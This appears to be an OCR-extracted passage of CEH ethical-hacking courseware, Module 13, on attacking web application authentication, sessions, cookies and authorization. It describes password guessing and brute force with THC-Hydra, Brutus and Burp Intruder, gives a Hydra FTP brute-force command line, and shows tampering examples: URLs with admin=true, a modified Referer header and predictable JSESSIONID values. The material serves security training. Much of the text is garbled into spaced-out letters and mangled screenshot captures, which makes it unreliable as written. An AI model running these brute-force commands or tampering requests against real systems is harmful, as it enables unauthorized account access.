echanism s Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. P a s s w o r d A t t a c k s : P a s s w o r d F u n c t i o n a l i t y E x p l o i t s P assw ord a tta c k s a re th e te c h n iq u e s used by th e a tta c k e r fo r d is c o v e rin g p assw ord s. A tta c k e rs e x p lo it th e p a ssw o rd fu n c tio n a lity so th a t th e y can bypass th e a u th e n tic a tio n m e c h a n is m. P a s s w o r d C h a n g i n g D e te rm in e p a ssw o rd ch ange fu n c tio n a lity w ith in th e a p p lic a tio n by s p id e rin g th e a p p lic a tio n o r c re a tin g a lo g in a c c o u n t. T ry ra n d o m strin g s fo r O ld P assw ord, N ew P assw ord, and C o n firm th e N e w P assw ord fie ld s and a nalyze e rro rs to id e n tify v u ln e ra b ilitie s in p a ssw o rd change fu n c tio n a lity. P a s s w o r d R e c o v e r y F o rg o t P assw ord fe a tu re s g e n e ra lly p re s e n t a c h a lle n g e to th e user; if th e n u m b e r o f -י ^ a tte m p ts is n o t lim ite d, a tta c k e rs can guess th e ch a lle n g e a n s w e r su cce ssfu lly w ith th e h e lp o f social e n g in e e rin g. A p p lic a tio n s m ay also send a u n iq u e re c o v e ry URL o r e x is tin g p a ssw o rd to an e m a il a ddre ss sp e cifie d by th e a tta c k e r if th e ch a lle n g e is so lve d. R e m e m b e r M e E x p l o i t R e m e m b e r M e fu n c tio n s a re im p le m e n te d usin g a sim p le p e rs is te n t c o o kie, such as R e m e m b e ru se r= ja so n o r a p e rs is te n t session id e n tifie r such as R e m e m b e ru ser= A B Y M odule 13 Page 1860

139 A tta c k e rs can use an e n u m e ra te d u ser n a m e o r p re d ic t th e session id e n tifie r to bypass a u th e n tic a tio n m e ch a n ism s. M odule 13 Page 1861

140 Password Attacks: Password Guessing Password List Attackers create a list o f possible passwords using m ost com m only used passwords, fo o tp rin tin g target and social engineeringtechniques, and try each password u n til the correct password is discovered re A tta ckers can cre a te a d ic tio n a ry Password D ictionary o f all possible passw ords using to o ls such as D ic tio n a ry M a k e r to p e rfo rm d ic tio n a ry a tta cks Tools Passw ord guessing can be p e rfo rm e d m a n u a lly o r using a u to m a te d to o ls such as B rutu s, TH C -Hydra,etc. CEH %!0 u it Target Pa3swcrdc Tuning Cpeciffc Gtart j *lout Ta1g«l Passwcrts Tun.ng 0pecific Gtart Username ( Username C Usomamo Lict C Password <* Passv/ora List Color separated rile r Leo Colon 6eporatod filo test! O u to jt H ydra v4 * (c) 5004 by v a n M a u ser/t H C u s e allo A/Pd only for legal p u rp o ses H yd a (tvto. vw.ua Ihc erg) starling at :58:52 [D A ' AJ 3 2 ta s k s. 1 se rv e rs, login tries (l:1/p:45380). ~1418 trie s p e rta s k [ d a t a ] a r a c k n g serv ice ftp on port 21 (STATUS] Ules/min Irles In00:01h lexfoIn00:031) [STATUS] ifles/min tries In00: tcxioIn [2 ו ][Tip] h o s t: lo g : m a rc p a s s w o rd : s u c c e s s Hyda (Mp.//*#swlhc erg) finisheda! :01:38 < r1nlshed> P" Try login as password [7 T ry empty passw ac; Gave Output I hydra ftp -I testuser -P /tmp/pa3slist.1xt -e ns Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. - P a s s w o r d A t t a c k s : P a s s w o r d G u e s s i n g J 1 = S - P assw ord g uessin g is a m e th o d w h e re an a tta c k e r guesses v a rio u s p a ssw o rd s u n til he o r she gets th e c o rre c t p a ssw o rd s by using th e fo llo w in g m e th o d s : p a ssw o rd list, p a ssw o rd d ic tio n a ry, and v a rio u s to o ls. A tta c k e rs c re a te a list o f p ossib le p a ssw o rd s usin g m o s t c o m m o n ly used p a ssw o rd s, fo o tp r in tin g ta rg e t and social e n g in e e rin g te c h n iq u e s, and try in g each p a ssw o rd u n til th e c o rre c t p a ssw o rd is d is c o v e re d. P a s s w o r d D i c t i o n a r y m A tta c k e rs can c re a te a d ic tio n a ry o f all p ossib le p a ssw o rd s usin g to o ls such as D ic tio n a ry M a k e r to p e rfo rm d ic tio n a ry a tta cks. T o o l s U s e d f o r P a s s w o r d G u e s s i n g P assw ord guessin g can be p e rfo rm e d m a n u a lly o r using a u to m a te d to o ls such as W e b C ra cke r, B ru tu s, B u rp In sid e r, TH C -H ydra, etc. T H C - H y d r a S ource: h ttp ://w w w.th c.o r g M odule 13 Page 1862

141 THC-HYDRA is a n e tw o rk lo g o n c ra c k e r th a t s u p p o rts m a n y d iffe r e n t services. This to o l is a p ro o f o f c o n c e p t co de, to give re se a rchers and s e c u rity c o n s u lta n ts th e p o s s ib ility to s h o w h o w easy it w o u ld be to gain u n a u th o riz e d re m o te access to a syste m. III III 1 1 <0 Q u it ן T a rg e t P a s s w o rd s T u n in g S p e c ific S tart T a rg e t P a s s w o rd s T u n in g S p e c ific S ta rt! IfIh H y d ra G T K [h י U s e rn a m e ( U s e rn a m e C U s e rn a m e L is t p a s sw ora C P a s s w o rd < P a ssw ord L is t C d o n s e p e ra te d file te s tu s e t /tm p /p a s s lis t.tx t O u tp u t H y d ra v 4 1 (c) by v a n H a u s e r / T H C u s e a llo w e d o n ly fo r le g a l p u rp o s e s. H y d ra ( h t t p /. w w w.th c o rg ) s ta rtin g at * ;5 8 :5 2 [D A T A ] 3 2 ta s k s. 1 s e rv e rs lo g in trie s (l:1 /p : ). ~ trie s p e r ta s k [D A T A ] a tta c k in g s e r v ic e ftp on p o rt 21 [S T A T U S ] tn e s 'm in, t rie s in 0 0 :0 1 h to d o in 0 0 :0 3 h [S T A T U S ] tn e s ^ m in trie s in 0 0 :0 2 h to d o in 0 0 :0 2 h [21 ][T ip ] h o s t: lo g in : m a r c p a s s w o r d : s u c c e s s H y d ra ( h ltp /.,w w w.th c o rg ) fin is h e d a t : < fln is h e d > U s e C o lo n se p e ra te d file (7 T ry log in a s p a s s w o rd F T ry e m p ty pa ssw o rd S f a r lj S t o p j r.ove O u tp u t C le a r O u tp u t fiy d r a ftp 1 te s tu s e r P /tm p /p a s s lis t.tx t e ns ^ 1y d ra ftp 1 m arc -P /tm p /p a s s lis t.tx t e ns -t 3 2 F I G U R E : T H C - H y d r a T o o l S c r e e n s h o t In a d d itio n to th e s e to o ls, B u rp In s id e r is also used fo r p a ssw o rd guessing. M odule 13 Page 1863

142 Password Attacks: Brute-forcing I CEH C o p y r ig h t by E&Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. P a s s w o r d A t t a c k s : B r u t e F o r c i n g wcav 1 1 B rute fo rce is one o f th e m e th o d s used fo r cracking passw ords. In a b ru te fo rcin g attack, attackers crack th e login passw ords by try in g all possible values fro m a set o f alphabe t, num eric, and special characters. The m a in lim ita tio n o f th e b ru te fo rc e a tta c k is this is beneficial in id e n tify in g small passw ords o f tw o characters. Guessing becom es m o re crucial w h e n th e passw ord length is long er and also if it contains le tte rs w ith b o th u p p e r and lo w e r case. If n u m b e rs and sym bols are used, th e n it m ig h t even take m o re th a n a fe w years to guess th e passw ord, w h ich is a lm o st practically im possible. C o m m o n ly used passw ord cracking too ls by a ttackers include Burp Suite's In tru d e r, Brutus, Sensepost's C row bar, etc. B u r p S u i t e ' s I n t r u d e r > Source: h ttp ://p o rts w ig g e r.n e t Burp In tru d e r is a m o d u le o f BurpSuite. It enables th e user to a u to m a tize pen te stin g on w e b applications. M odule 13 Page 1864

143 ourp intruder repeater window about burp suite free e d itio n v intruder \ repeater [ sequencer f decoder [ comparer ' options \ alerts spider s c a n n e r target positions j payloads ' options numder of payloads: number of requests payload set 1 brute forcer character set [at)cdefghijklmnopqtstuvwxy j max length p a y lo a d p r o c e s s i n g r u l e s to uppercase F I G U R E : B u r p S u i t e ' s I n t r u d e r T o o l S c r e e n s h o t B r u t u s Source: h ttp ://w w w.h o o b ie.n e t B rutus is a re m o te passw ord cracking to o l. B rutus su p p o rts HTTP, POP3, FTP, SMB, Telnet, IM AP, NNTP, and m a n y o th e r a u th e n tic a tio n types. It includes a m ulti-sta g e a u th e n tic a tio n engine and can m ake 60 sim u lta n e o u s ta rg e t connections. B r u t u s - A E T 2 - w w w. h o o b i e. n e t / b r u t u s - ( J a n u a r y ) < F ile T o o ls H e lp Targe( Connection Options Pott Connections Tjpe HTTP (Basic Auth) J Start Slep Cleat 10 Timeout r J 10 I- Use Proxy Deline HTTP (Basic) Options Method HEAD ^ P KeepAive Authentication Options 7 Use Username f~ Single Use! Pass Mode w otd List Usei File users, txlj Browse Pass Fie w 1ds.txt Biowse Positive Authentication Results Target / V 1?7nn v Opened user fie containing 6 users. Opened password lile containing 818 Passwords Maximum nurnhpr nf flulhenlicrtfinn alfpmnts wil he 4908 HTTP (Basic Auth) H T T P (B asic Auth) H T T P IR n s ir A ij l h l Username admin backup a rlm in Password academic Timeout Reject Auth Sea Throttle Quick Kill FIGURE : B ru tu s T o o l S c r e e n s h o t M odule 13 Page 1865

144 C o p y r ig h t b y EC-Couactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. S e s s i o n A t t a c k s : S e s s i o n I D P r e d i c t i o n / B r u t e F o r c i n g Every tim e a user logs in to a p a rtic u la r w e b s ite, th e n a session ID is g ive n to th e user. This session ID is v a lid u n til th e session is te rm in a te d and a n e w session ID is p ro v id e d w h e n th e user logs in again. A tta c k e rs tr y to e x p lo it th is se ssio n ID m e c h a n is m by guessing th e n e x t session ID a fte r c o lle c tin g so m e va lid session IDs. 0 In th e fir s t ste p, th e a tta c k e r c o lle c ts so m e va lid session ID va lu e s by s n iffin g tr a ffic fro m a u th e n tic a te d users. A tta c k e rs th e n a nalyze c a p tu re d session IDs to d e te rm in e th e session ID g e n e ra tio n process such as th e s tru c tu re o f session ID, th e in fo rm a tio n th a t is used to c re a te it, and th e e n c ry p tio n o r hash a lg o rith m used b y th e a p p lic a tio n to p ro te c t it. In a d d itio n, th e a tta c k e r can im p le m e n t a b ru te fo rc e te c h n iq u e to g e n e ra te and te s t d iffe r e n t va lu e s o f th e session ID u n til he o r she successfu lly g e ts access to th e a p p lic a tio n. M odule 13 Page 1866

145 V u ln e ra b le session g e n e ra tio n m e ch a n ism s th a t use session IDs co m p o s e d by user n am e o r o th e r p re d ic ta b le in fo rm a tio n, like tim e s ta m p o r c lie n t IP a ddre ss, can be e x p lo ite d by easily guessing v a lid session IDs. GET menu=410http/1.1 H o s t:ja n a in a : U ser*a gent: M o z illa /5.0 (W in d o w ; U; W in d o w s NT 5.2 ; e n * U S ;rv : ) G ec k o / F ire fo x / R e q u e s t A c c e p t:te x t/x m l,a p p llc a tlo n /x m l,a p p llc a tlo n /x h tm k * m l,te x t/h tm d ;q - 0.9,te x t/p la in ;q = 0.8,lm a g e /p n g,v,',q = 0.5 R e fe re r: h ttp : //la n a in a : /W eb G o a t/attac k?s cre en = 1 7 & m en u = י C o o k ie; JS ESSIO N ID =user01 A u th o riz a tio n : B asic23v ic3q 623V lc3q Predictable Session Cookie F I G U R E : S e s s i o n I D P r e d i c t i o n / B r u t e F o r c i n g For c e rta in w e b a p p lic a tio n s, th e session ID in fo rm a tio n is u sually co m p o s e d o f a s trin g o f fix e d w id th. R andom ness is e ssentia l in o rd e r to a void p re d ic tio n. From th e d ia g ra m yo u can see th a t th e session ID v a ria b le is in d ic a te d by JSESSIONID and a ssum in g its va lu e as "u s e ro l," w h ic h c o rre s p o n d s to th e user n a m e. By guessin g th e n e w va lu e fo r it, say as "u s e r 0 2," it is p ossible fo r th e a tta c k e r to gain u n a u th o riz e d access to th e a p p lic a tio n. M odule 13 Page 1867

146 Cookie Exploitation: Cookie Poisoning I f th e c o o k ie c o n ta in s p a s s w o rd s o r s e s s io n id e n tifie r s, a tta c k e rs can s te a l th e c o o k ie u s in g te c h n iq u e s su ch as s c r ip t in je c tio n a n d e a v e s d ro p p in g A tta c k e rs th e n re p la y th e c o o k ie w ith th e s a m e o r a lte re d p a s s w o rd s o r se s s io n id e n tifie rs to b y p a s s w e b a p p lic a tio n a u th e n tic a tio n A ttackers can tra p cookies using tools such as OW ASP Zed A tta c k Proxy, B urp S u ite, etc. dfj 13 Q1? 1, <2> ile Edit View Analyse Report Tools Hole Requests j Response Brga«.Xj ' J M J U j U B i H i - * " 1*1 C Untifled Session - OWASP ZAP itt *_.: ו ו _ M cxilw S.C *.יISiadc t t.2 ; EHK«4t Appl«V ebk it/537.4 (KETKL I lk Scckol Cfcr0K*/ ».9 4 S«C«X1 / Cache-C onti0 1: oax-aoe=0 A ccept! / Rererer: ntcr://in.yonoc.oca»/?p^;3 A eeept-e nccding: a deft A ccept-l an^uiqv: cn-u S,«n;q^>.9 A cc v p t-c h a sav t: XSO -S559-1.at -S;<f-C. 7, jq C ookl : a<uld015s24s9e12sar4e: «< u r-:3 S 4 «U ~ C m 3: Hoats ti.a d ls ie z a x.c o a it 19: 1 History aruekxe ].! 1 Seatdi ^ Alerts ran > j spioer j*f*. Current Scans 0 URI found during aa*m URi found bui oul of aart scope Alerts r»00 - p o f»0 h ttp s://w w w.ow a sp.org cunwscam_* 0 *0 0 wo C o p y r ig h t b y EC-Gauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n Is S t r ic t ly P r o h ib ite d C o o k i e E x p l o i t a t i o n : C o o k i e P o i s o n i n g C ookies fre q u e n tly tra n s m it s e n s itiv e c re d e n tia ls and can be m o d ifie d w ith ease to e scala te access o r assum e th e id e n tity o f a n o th e r user. C ookies are used to m a in ta in a session s ta te in th e o th e rw is e sta te le ss HTTP p ro to c o l. Sessions are in te n d e d to be u n iq u e ly tie d to th e in d iv id u a l accessing th e w e b a p p lic a tio n. P o isonin g o f co o kie s and session in fo rm a tio n can a llo w an a tta c k e r to in je c t m a lic io u s c o n te n t o r o th e rw is e m o d ify th e u ser's o n lin e e x p e rie n c e and o b ta in u n a u th o riz e d in fo rm a tio n. C ookies can c o n ta in se ssio n -sp e cific d a ta such as user IDs, p a ssw o rd s, a c c o u n t n u m b e rs, links to s h o p p in g c a rt c o n te n ts, s u p p lie d p riv a te in fo rm a tio n, and session IDs. C ookies e xist as file s s to re d in th e c lie n t c o m p u te r's m e m o ry o r hard disk. By m o d ify in g th e d a ta in th e c o o k ie, an a tta c k e r can o fte n gain e scala te d access o r m a lic io u s ly a ffe c t th e u ser's session. M a n y sites o ffe r th e a b ility to "R e m e m b e r m e? " and s to re th e u ser's in fo rm a tio n in a c o o k ie, so he o r she d oes n o t have to re -e n te r th e d a ta w ith e v e ry v is it to th e site. A n y p riv a te in fo rm a tio n e n te re d is s to re d in a c o o kie. In an a tte m p t to p ro te c t co o kie s, site d e v e lo p e rs o fte n e n c o d e th e co o kie s. Easily re v e rs ib le e n c o d in g m e th o d s such as Base64 and ROT13 (ro ta tin g th e le tte rs o f th e a lp h a b e t 13 ch a ra c te rs ) give m a n y w h o v ie w co o kie s a fa lse sense o f s e c u rity. If th e co o kie c o n ta in s p a ssw o rd s o r session id e n tifie rs, a tta c k e rs can steal th e co o kie using te c h n iq u e s such as s c rip t in je c tio n and e a v e s d ro p p in g. A tta c k e rs th e n re p la y th e co o kie w ith th e sam e o r a lte re d M odule 13 Page 1868

147 p a ssw o rd s o r session id e n tifie rs to bypass w e b a p p lic a tio n a u th e n tic a tio n. E xam ples o f to o ls used by th e a tta c k e r fo r tra p p in g co o kie s in c lu d e O W ASP Zed A tta c k P ro xy, B u rp S u ite, e tc. O W ASP Zed A tta c k P ro xy י] [ S ource: h ttp s ://w w w.o w a s p.o rg O W ASP Zed A tta c k P ro xy P ro je c t (ZAP) is an in te g ra te d p e n e tra tio n te s tin g to o l fo r te s tin g w e b a p p lic a tio n s. It p ro v id e s a u to m a te d sca nners as w e ll as a se t o f to o ls th a t a llo w yo u to fin d s e c u rity v u ln e ra b ilitie s m a n u a lly. O U n t i t l e d S e s s io n - O W A S P Z A P _ 1 ם _ 1 x 1 ile E d it v ie w A n a ly s e R e p o rt T o o ls H e lp 1 1 J t d H r i s s i O Q v Q v -*0 b 0 f S ite s ( *! f R e q u e s t1- * j R e s p o n s e j B re a k > C ]» f= h ttp //tr a d in te» y tr U y a h o o _ H e a d e r: T e xt * j B o dy: T e xt T U s e r - A g e n t : M o z i l l a / 5. 0 ( W in d o w s N T 6. 2 ; W O W 64) A p p l e W e b K i t / ( K H T M L, 4 l l l c e G e c k o ) C h r o m e / S a f a r l / S C a c h e - C o n t r o l : m a x - a g e _ 0 k A c c e p t : * / * R e f e r e r : h t t p : / / i n. y a h o o. c o m /? p u s A c c e p t - E n c o d i n g : s d c h A c c e p t - L a n g u a g e : e n - O S, e n ; q 0.8 * 3-0. q l, u t f - 8 ; q , * ; A c c e p t - C h a r s e t : 1 s s 9 C o o k i e : a d x i d S a f 4 6 ; a d x f e H o s t : t r. a d i n t e r a x. c o m * H is to ry S e arch \ B re a k P o in ts \ A le rts A ctive S c a n J ^ S p i d e r ^ : J B rute F o rc e - [ P o rt S c a n ] F uzze r ] P a ra m s [ 3 J O u tpu t Site : tr a d in te ra x c o m :8 0 T [> I I C u rre n t S c a n s :0? URI found during crawl: U R I fo u n d but o u t o f c raw l scop e : A le rts 1 ^ 0 0 C u rre n t S c a n s F i g u r e : O W A S P Z e d A t t a c k P r o x y T o o l S c r e e n s h o t M odule 13 Page 1869

148 Attack Web Servers Attack Authentication Mechanism Attack Session Attack Attack Management Data Connectivity Web Services Mechanism C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. י 1 - W e b A p p H a c k i n g M e t h o d o l o g y A u th o riz a tio n p ro te c ts th e w e b a p p lic a tio n s by g ivin g a u th o r ity to c e rta in users fo r accessing th e a p p lic a tio n s and re s tric tin g c e rta in users fro m accessing such a p p lic a tio n s. A tta c k e rs by m eans o f a u th o riz a tio n a tta c k s tr y to g ain access to th e in fo rm a tio n re so u rces w ith o u t p ro p e r c re d e n tia ls. The w a ys to a tta c k a u th o riz a tio n s ch e m e s a re e x p la in e d on th e fo llo w in g slides. M odule 13 Page 1870

149 Authorization Attack CEH C«rt1fW4 itfciul Nm Im ^ A tta c k e rs m a n ip u la te th e HTTP re q u e s ts to s u b v e rt th e a p p lic a tio n a u th o riz a tio n sch e m e s b y m o d ify in g in p u t fie ld s th a t relate to user ID, user nam e, access g roup, cost, filenam es, file id entifiers, etc. A tta c k e rs f ir s t access w e b a p p lic a tio n u s in g lo w p riv ile g e d a c c o u n t a n d th e n e s c a la te p riv ile g e s to access p r o te c te d re s o u rc e s Q u e r y S t r i n g H i d d e n T a g s C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. A u t h o r i z a t i o n A t t a c k In an a u th o riz a tio n a tta c k, th e a tta c k e r fir s t fin d s th e lo w e s t p riv ile g e d a c c o u n t and th e n logs in as an a u th e n tic user and s lo w ly escalates p riv ile g e s to access p ro te c te d reso urces. A tta c k e rs m a n ip u la te th e HTTP re q u e s ts to s u b v e rt th e a p p lic a tio n a u th o riz a tio n sch e m e s by m o d ify in g in p u t fie ld s th a t re la te to u ser ID, user n a m e, access g ro u p, co st, file n a m e s, file id e n tifie rs, etc. The so urces th a t are used by th e a tta c k e rs in o rd e r to p e rfo rm a u th o riz a tio n a tta c k s in c lu d e u n ifo rm re s o u rc e id e n tifie r, p a ra m e te r ta m p e rin g, POST d a ta, HTTP h e a d e rs, q u e ry s trin g, co o kie s, and h id d e n tags. P a r a m e t e r T a m p e r i n g P a ra m e te r ta m p e rin g is an a tta c k th a t is based on th e m a n ip u la tio n o f p a ra m e te rs th a t are e xchanged b e tw e e n se rv e r and c lie n t in o rd e r to m o d ify th e a p p lic a tio n d ata, such as p rice and q u a n tity o f p ro d u c ts, p e rm is s io n s and u ser c re d e n tia ls, etc. This in fo rm a tio n is u sually s to re d in co o kie s, URL q u e ry strin g s, o r h id d e n fo rm fie ld s, and th a t is used to increase in c o n tro l and a p p lic a tio n fu n c tio n a lity. l E P P o s t D a t a Post d a ta o fte n is c o m p ris e d o f a u th o riz a tio n and session in fo rm a tio n, since in m o s t o f th e a p p lic a tio n s, th e in fo rm a tio n th a t is p ro v id e d by th e c lie n t m u s t be a sso cia te d M odule 13 Page 1871

150 w ith th e session th a t had p ro v id e d it. The a tta c k e r e x p lo itin g v u ln e ra b ilitie s in th e p o s t d a ta can e asily m a n ip u la te th e p o st d a ta and th e in fo rm a tio n in it. M odule 13 Page 1872

151 H T T P R e q u e s t T a m p e r in g CEH Q u e ry S trin g T am p e rin g J I f th e q u e ry s trin g is v is ib le in th e a d d re s s b a r o n th e b ro w s e r, th e a tta c k e r can e a s ily c h a n g e th e s trin g p a ra m e te r to b y p a s s a u th o r iz a tio n m e c h a n is m s h t t p : / / w w w. j u g g y b o y. c o m / m a i l. a s p x? m a i l b o x = j o h n & c o m p a n y = a c m e % 2 0 c o n 1 h t t p s : / / j u g g y s h o p. c o m / b o o k s / d o w n l o a d / p d f h t t p s : / / j u g g y b a n k. c o m / l o g i n / h o m e. j s p? a d m i n = t r u e J A ttackers can use w e b spidering tools such as B u rp S uite to scan th e w e b app fo r POST param eters HTTP H e a d e rs J I f th e a p p lic a tio n uses th e R e fe re r h e a d e r f o r m a k in g access c o n tr o l d e c is io n s, a tta c k e rs can m o d ify it to access p r o te c te d a p p lic a tio n f u n c tio n a litie s GET =»201 HTTP/1.1 Host: janaina:8180 User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-us; rv: ) Gecko/ Firefox/ Accept: text/xml, application/xml, application/xhtml+xml,text/htmtl;g-0.9,text/plain;g=0.8,image/png,*/* g=0.5 Proxy-Connection: keep-alive Referer: http: // juggyboy: 8180/Applications/Download?Admin = False lte m ld = 201 is n o t accessible as A d m in param eter is set to false, attacker can change it to tru e and access protected item s C o p y r ig h t by EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. H T T P R e q u e s t T a m p e r i n g A tta c k e rs ta m p e r w ith th e HTTP re q u e s t w ith o u t using a n o th e r u ser's ID. The a tta c k e r changes th e re q u e s t in b e tw e e n b e fo re th e m essage is re ce ive d by th e in te n d e d re ce ive r. Q u e r y S t r i n g T a m p e r i n g An a tta c k e r ta m p e rs w ith th e q u e ry s trin g w h e n th e w e b a p p lic a tio n s use q u e ry s trin g s to pass on th e m essages b e tw e e n pages. If th e q u e ry s trin g is v is ib le in th e a ddre ss b a r on th e b ro w s e r, th e a tta c k e r can e asily change th e s trin g p a ra m e te r to bypass a u th o riz a tio n m e ch a n ism s. F I G U R E : Q u e r y S t r i n g T a m p e r i n g A tta c k e rs can use w e b s p id e rin g to o ls such as B urp S u ite to scan th e w e b a pp fo r POST p a ra m e te rs. H T T P H e a d e r s If th e a p p lic a tio n uses th e R e fe rre r h e a d e r fo r m a k in g access c o n tro l d e cisio n s, M odule 13 Page 1873